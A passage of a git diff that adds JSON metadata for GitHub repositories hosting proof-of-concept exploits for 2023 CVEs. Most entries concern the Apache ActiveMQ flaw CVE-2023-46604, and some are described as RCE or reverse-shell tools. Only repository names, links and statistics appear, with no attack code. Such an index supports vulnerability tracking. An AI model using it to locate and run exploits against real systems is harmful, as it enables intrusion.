"public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46304.json b/2023/CVE-2023-46304.json new file mode 100644 index 0000000000..fa0d160724 --- /dev/null +++ b/2023/CVE-2023-46304.json @@ -0,0 +1,33 @@ +[ + { + "id": 781611038, + "name": "CVE-2023-46304", + "full_name": "jselliott\/CVE-2023-46304", + "owner": { + "login": "jselliott", + "id": 13350778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13350778?v=4", + "html_url": "https:\/\/github.com\/jselliott", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jselliott\/CVE-2023-46304", + "description": "Authenticated Remote Code Execution in in VTiger Open Source CRM v7.5", + "fork": false, + "created_at": "2024-04-03T17:57:23Z", + "updated_at": "2024-08-01T11:27:40Z", + "pushed_at": "2024-04-03T19:00:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4631.json b/2023/CVE-2023-4631.json new file mode 100644 index 0000000000..94ff0e77be --- /dev/null +++ b/2023/CVE-2023-4631.json @@ -0,0 +1,33 @@ +[ + { + "id": 695793018, + "name": "CVE-2023-4631", + "full_name": "b0marek\/CVE-2023-4631", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4631", + "description": "Repository for CVE-2023-4631 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:38:58Z", + "updated_at": "2023-09-24T08:38:59Z", + "pushed_at": "2023-09-24T08:44:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4634.json b/2023/CVE-2023-4634.json new file mode 100644 index 0000000000..4d8e2aee34 --- /dev/null +++ b/2023/CVE-2023-4634.json @@ -0,0 +1,33 @@ +[ + { + "id": 687359738, + "name": "CVE-2023-4634", + "full_name": "Patrowl\/CVE-2023-4634", + "owner": { + "login": "Patrowl", + "id": 28858120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28858120?v=4", + "html_url": "https:\/\/github.com\/Patrowl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Patrowl\/CVE-2023-4634", + "description": "CVE-2023-4634", + "fork": false, + "created_at": "2023-09-05T07:44:15Z", + "updated_at": "2024-11-25T06:12:49Z", + "pushed_at": "2023-09-07T05:36:10Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 46, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46344.json b/2023/CVE-2023-46344.json new file mode 100644 index 0000000000..1a3ecd6520 --- /dev/null +++ b/2023/CVE-2023-46344.json @@ -0,0 +1,33 @@ +[ + { + "id": 736803632, + "name": "CVE-2023-46344", + "full_name": "vinnie1717\/CVE-2023-46344", + "owner": { + "login": "vinnie1717", + "id": 28691535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4", + "html_url": "https:\/\/github.com\/vinnie1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-46344", + "description": null, + "fork": false, + "created_at": "2023-12-28T23:29:53Z", + "updated_at": "2023-12-28T23:29:53Z", + "pushed_at": "2023-12-28T23:33:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4636.json b/2023/CVE-2023-4636.json new file mode 100644 index 0000000000..eaf429dda0 --- /dev/null +++ b/2023/CVE-2023-4636.json @@ -0,0 +1,33 @@ +[ + { + "id": 731273709, + "name": "CVE-2023-4636", + "full_name": "ThatNotEasy\/CVE-2023-4636", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-4636", + "description": "Unauthenticated Remote Code Execution with default Imagick", + "fork": false, + "created_at": "2023-12-13T17:59:02Z", + "updated_at": "2023-12-13T18:06:18Z", + "pushed_at": "2023-12-13T18:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46371.json b/2023/CVE-2023-46371.json new file mode 100644 index 0000000000..36704982e6 --- /dev/null +++ b/2023/CVE-2023-46371.json @@ -0,0 +1,33 @@ +[ + { + "id": 855189701, + "name": "CVE-poc-update", + "full_name": "Jianchun-Ding\/CVE-poc-update", + "owner": { + "login": "Jianchun-Ding", + "id": 110085007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110085007?v=4", + "html_url": "https:\/\/github.com\/Jianchun-Ding", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jianchun-Ding\/CVE-poc-update", + "description": "CVE-2023-46371 and CVE-2023-46527 update", + "fork": false, + "created_at": "2024-09-10T13:18:02Z", + "updated_at": "2024-10-17T14:48:10Z", + "pushed_at": "2024-10-17T14:48:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46404.json b/2023/CVE-2023-46404.json new file mode 100644 index 0000000000..99435bd4ba --- /dev/null +++ b/2023/CVE-2023-46404.json @@ -0,0 +1,33 @@ +[ + { + "id": 710370837, + "name": "CVE-2023-46404", + "full_name": "windecks\/CVE-2023-46404", + "owner": { + "login": "windecks", + "id": 55925786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55925786?v=4", + "html_url": "https:\/\/github.com\/windecks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windecks\/CVE-2023-46404", + "description": "PoC and Writeup for CVE-2023-46404.", + "fork": false, + "created_at": "2023-10-26T15:01:32Z", + "updated_at": "2023-11-13T18:42:18Z", + "pushed_at": "2023-10-28T17:53:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46442.json b/2023/CVE-2023-46442.json new file mode 100644 index 0000000000..5154170105 --- /dev/null +++ b/2023/CVE-2023-46442.json @@ -0,0 +1,33 @@ +[ + { + "id": 805310377, + "name": "CVE-2023-46442_POC", + "full_name": "JAckLosingHeart\/CVE-2023-46442_POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2023-46442_POC", + "description": "POC for CVE-2023-46442 Denial of Service vulnerability found within Soot", + "fork": false, + "created_at": "2024-05-24T10:03:38Z", + "updated_at": "2024-11-07T05:07:25Z", + "pushed_at": "2024-05-24T12:04:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46447.json b/2023/CVE-2023-46447.json new file mode 100644 index 0000000000..61c3957158 --- /dev/null +++ b/2023/CVE-2023-46447.json @@ -0,0 +1,35 @@ +[ + { + "id": 625225802, + "name": "rebel", + "full_name": "actuator\/rebel", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/rebel", + "description": "CVE-2023-46447 | VU#672804 ", + "fork": false, + "created_at": "2023-04-08T13:03:58Z", + "updated_at": "2024-01-19T12:28:09Z", + "pushed_at": "2023-10-01T12:53:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46447" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46449.json b/2023/CVE-2023-46449.json new file mode 100644 index 0000000000..4451fa5b49 --- /dev/null +++ b/2023/CVE-2023-46449.json @@ -0,0 +1,33 @@ +[ + { + "id": 710291166, + "name": "CVE-2023-46449", + "full_name": "sajaljat\/CVE-2023-46449", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46449", + "description": null, + "fork": false, + "created_at": "2023-10-26T12:03:29Z", + "updated_at": "2023-10-26T12:03:30Z", + "pushed_at": "2023-10-26T20:59:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46450.json b/2023/CVE-2023-46450.json new file mode 100644 index 0000000000..dcf3314324 --- /dev/null +++ b/2023/CVE-2023-46450.json @@ -0,0 +1,33 @@ +[ + { + "id": 710302205, + "name": "-CVE-2023-46450", + "full_name": "yte121\/-CVE-2023-46450", + "owner": { + "login": "yte121", + "id": 55489792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4", + "html_url": "https:\/\/github.com\/yte121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yte121\/-CVE-2023-46450", + "description": " CVE-2023-46450 reference", + "fork": false, + "created_at": "2023-10-26T12:30:21Z", + "updated_at": "2023-10-26T12:30:21Z", + "pushed_at": "2023-10-26T20:59:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46451.json b/2023/CVE-2023-46451.json new file mode 100644 index 0000000000..1e53518774 --- /dev/null +++ b/2023/CVE-2023-46451.json @@ -0,0 +1,33 @@ +[ + { + "id": 710303698, + "name": "CVE-2023-46451", + "full_name": "sajaljat\/CVE-2023-46451", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46451", + "description": null, + "fork": false, + "created_at": "2023-10-26T12:34:03Z", + "updated_at": "2023-10-26T12:34:03Z", + "pushed_at": "2023-10-26T21:01:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46454.json b/2023/CVE-2023-46454.json new file mode 100644 index 0000000000..3772cbcde8 --- /dev/null +++ b/2023/CVE-2023-46454.json @@ -0,0 +1,33 @@ +[ + { + "id": 728920376, + "name": "GL.iNet-Multiple-Vulnerabilities", + "full_name": "cyberaz0r\/GL.iNet-Multiple-Vulnerabilities", + "owner": { + "login": "cyberaz0r", + "id": 35109470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35109470?v=4", + "html_url": "https:\/\/github.com\/cyberaz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberaz0r\/GL.iNet-Multiple-Vulnerabilities", + "description": "Exploits for GL.iNet CVE-2023-46454, CVE-2023-46455 and CVE-2023-46456", + "fork": false, + "created_at": "2023-12-08T01:45:16Z", + "updated_at": "2024-02-15T02:08:56Z", + "pushed_at": "2023-12-08T04:35:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46474.json b/2023/CVE-2023-46474.json new file mode 100644 index 0000000000..e7268a38e6 --- /dev/null +++ b/2023/CVE-2023-46474.json @@ -0,0 +1,33 @@ +[ + { + "id": 741848730, + "name": "CVE-2023-46474", + "full_name": "Xn2\/CVE-2023-46474", + "owner": { + "login": "Xn2", + "id": 19215931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19215931?v=4", + "html_url": "https:\/\/github.com\/Xn2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xn2\/CVE-2023-46474", + "description": "Technical details for CVE-2023-46474", + "fork": false, + "created_at": "2024-01-11T08:35:18Z", + "updated_at": "2024-01-12T17:13:16Z", + "pushed_at": "2024-01-11T08:40:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46478.json b/2023/CVE-2023-46478.json new file mode 100644 index 0000000000..8023b4ae6e --- /dev/null +++ b/2023/CVE-2023-46478.json @@ -0,0 +1,33 @@ +[ + { + "id": 711887805, + "name": "CVE-2023-46478", + "full_name": "mr-xmen786\/CVE-2023-46478", + "owner": { + "login": "mr-xmen786", + "id": 79393031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79393031?v=4", + "html_url": "https:\/\/github.com\/mr-xmen786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-xmen786\/CVE-2023-46478", + "description": null, + "fork": false, + "created_at": "2023-10-30T11:28:43Z", + "updated_at": "2023-10-30T11:28:44Z", + "pushed_at": "2023-10-30T14:01:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46501.json b/2023/CVE-2023-46501.json new file mode 100644 index 0000000000..3bef8fad29 --- /dev/null +++ b/2023/CVE-2023-46501.json @@ -0,0 +1,33 @@ +[ + { + "id": 712418367, + "name": "CVE-2023-46501", + "full_name": "Cyber-Wo0dy\/CVE-2023-46501", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-46501", + "description": "BoltWire v6.03 vulnerable to \"Improper Access Control\"", + "fork": false, + "created_at": "2023-10-31T12:40:14Z", + "updated_at": "2024-08-11T14:46:00Z", + "pushed_at": "2023-10-31T12:41:20Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46604.json b/2023/CVE-2023-46604.json new file mode 100644 index 0000000000..29df50151e --- /dev/null +++ b/2023/CVE-2023-46604.json @@ -0,0 +1,844 @@ +[ + { + "id": 710110251, + "name": "ActiveMQ-RCE", + "full_name": "trganda\/ActiveMQ-RCE", + "owner": { + "login": "trganda", + "id": 62204882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4", + "html_url": "https:\/\/github.com\/trganda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trganda\/ActiveMQ-RCE", + "description": "CVE-2023-46604", + "fork": false, + "created_at": "2023-10-26T03:25:05Z", + "updated_at": "2024-05-16T02:37:15Z", + "pushed_at": "2023-10-26T03:28:14Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710638824, + "name": "ActiveMQ-RCE", + "full_name": "X1r0z\/ActiveMQ-RCE", + "owner": { + "login": "X1r0z", + "id": 28532286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28532286?v=4", + "html_url": "https:\/\/github.com\/X1r0z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X1r0z\/ActiveMQ-RCE", + "description": "ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具", + "fork": false, + "created_at": "2023-10-27T05:57:21Z", + "updated_at": "2024-12-31T06:57:19Z", + "pushed_at": "2024-01-29T02:28:11Z", + "stargazers_count": 236, + "watchers_count": 236, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 236, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 710778413, + "name": "ActiveMQ_RCE_Pro_Max", + "full_name": "JaneMandy\/ActiveMQ_RCE_Pro_Max", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/ActiveMQ_RCE_Pro_Max", + "description": "CVE-2023-46604", + "fork": false, + "created_at": "2023-10-27T12:22:43Z", + "updated_at": "2024-12-26T03:27:25Z", + "pushed_at": "2023-11-03T14:14:31Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 63, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 714084454, + "name": "CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "full_name": "SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "owner": { + "login": "SaumyajeetDas", + "id": 66937297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66937297?v=4", + "html_url": "https:\/\/github.com\/SaumyajeetDas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ", + "description": " Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604) ", + "fork": false, + "created_at": "2023-11-03T22:06:09Z", + "updated_at": "2025-01-05T08:55:50Z", + "pushed_at": "2024-01-20T16:59:23Z", + "stargazers_count": 111, + "watchers_count": 111, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 111, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 714263844, + "name": "CVE-2023-46604", + "full_name": "evkl1d\/CVE-2023-46604", + "owner": { + "login": "evkl1d", + "id": 113887123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113887123?v=4", + "html_url": "https:\/\/github.com\/evkl1d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evkl1d\/CVE-2023-46604", + "description": null, + "fork": false, + "created_at": "2023-11-04T11:58:21Z", + "updated_at": "2024-12-04T14:17:30Z", + "pushed_at": "2023-11-06T07:26:30Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714895258, + "name": "CVE-2023-46604", + "full_name": "sule01u\/CVE-2023-46604", + "owner": { + "login": "sule01u", + "id": 33783361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33783361?v=4", + "html_url": "https:\/\/github.com\/sule01u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sule01u\/CVE-2023-46604", + "description": " CVE-2023-46604 ActiveMQ RCE vulnerability verification\/exploitation tool", + "fork": false, + "created_at": "2023-11-06T04:05:51Z", + "updated_at": "2024-11-30T04:53:43Z", + "pushed_at": "2023-11-12T10:40:14Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-46604" + ], + "visibility": "public", + "forks": 6, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715968405, + "name": "CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "full_name": "justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "owner": { + "login": "justdoit-cai", + "id": 126458073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126458073?v=4", + "html_url": "https:\/\/github.com\/justdoit-cai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp", + "description": "CVE-2023-46604 Apache ActiveMQ RCE exp 基于python", + "fork": false, + "created_at": "2023-11-08T07:48:00Z", + "updated_at": "2023-12-06T06:14:14Z", + "pushed_at": "2023-11-08T07:52:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716551880, + "name": "ActiveMQ-RCE-CVE-2023-46604-Write-up", + "full_name": "h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up", + "owner": { + "login": "h3x3h0g", + "id": 128398565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128398565?v=4", + "html_url": "https:\/\/github.com\/h3x3h0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up", + "description": null, + "fork": false, + "created_at": "2023-11-09T11:27:20Z", + "updated_at": "2024-12-04T14:17:17Z", + "pushed_at": "2023-11-09T11:36:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 717720175, + "name": "CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "full_name": "duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell", + "description": "This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.", + "fork": false, + "created_at": "2023-11-12T11:26:46Z", + "updated_at": "2024-11-22T09:36:49Z", + "pushed_at": "2024-01-24T13:44:29Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 719245638, + "name": "CVE-2023-46604-POC", + "full_name": "vjayant93\/CVE-2023-46604-POC", + "owner": { + "login": "vjayant93", + "id": 47580148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47580148?v=4", + "html_url": "https:\/\/github.com\/vjayant93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vjayant93\/CVE-2023-46604-POC", + "description": "POC repo for CVE-2023-46604", + "fork": false, + "created_at": "2023-11-15T19:11:01Z", + "updated_at": "2023-11-15T19:11:02Z", + "pushed_at": "2023-11-16T21:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719369149, + "name": "CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "full_name": "LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "owner": { + "login": "LiritoShawshark", + "id": 56113617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56113617?v=4", + "html_url": "https:\/\/github.com\/LiritoShawshark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence", + "description": "CVE-2023-46604环境复现包", + "fork": false, + "created_at": "2023-11-16T02:36:07Z", + "updated_at": "2024-01-24T04:49:52Z", + "pushed_at": "2023-11-16T02:37:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720423496, + "name": "CVE-2023-46604-RCE", + "full_name": "NKeshawarz\/CVE-2023-46604-RCE", + "owner": { + "login": "NKeshawarz", + "id": 151177833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151177833?v=4", + "html_url": "https:\/\/github.com\/NKeshawarz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NKeshawarz\/CVE-2023-46604-RCE", + "description": null, + "fork": false, + "created_at": "2023-11-18T12:51:03Z", + "updated_at": "2023-12-07T21:36:30Z", + "pushed_at": "2023-11-18T13:18:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720937725, + "name": "ActiveMQ_CVE-2023-46604", + "full_name": "minhangxiaohui\/ActiveMQ_CVE-2023-46604", + "owner": { + "login": "minhangxiaohui", + "id": 39674723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39674723?v=4", + "html_url": "https:\/\/github.com\/minhangxiaohui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minhangxiaohui\/ActiveMQ_CVE-2023-46604", + "description": "PY", + "fork": false, + "created_at": "2023-11-20T02:24:47Z", + "updated_at": "2023-11-21T01:50:16Z", + "pushed_at": "2023-11-20T07:41:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721121106, + "name": "CVE-2023-46604-demo", + "full_name": "nitzanoligo\/CVE-2023-46604-demo", + "owner": { + "login": "nitzanoligo", + "id": 100521249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100521249?v=4", + "html_url": "https:\/\/github.com\/nitzanoligo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitzanoligo\/CVE-2023-46604-demo", + "description": null, + "fork": false, + "created_at": "2023-11-20T11:57:24Z", + "updated_at": "2024-11-05T13:10:04Z", + "pushed_at": "2024-11-05T13:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, 